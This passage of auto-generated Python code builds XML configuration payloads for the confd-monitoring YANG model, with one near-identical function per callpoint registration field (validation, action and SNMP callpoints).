path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(validationpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id = ET.SubElement(actionpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(actionpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id = ET.SubElement(snmp_inform_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_inform_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id = ET.SubElement(snmp_notification_subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
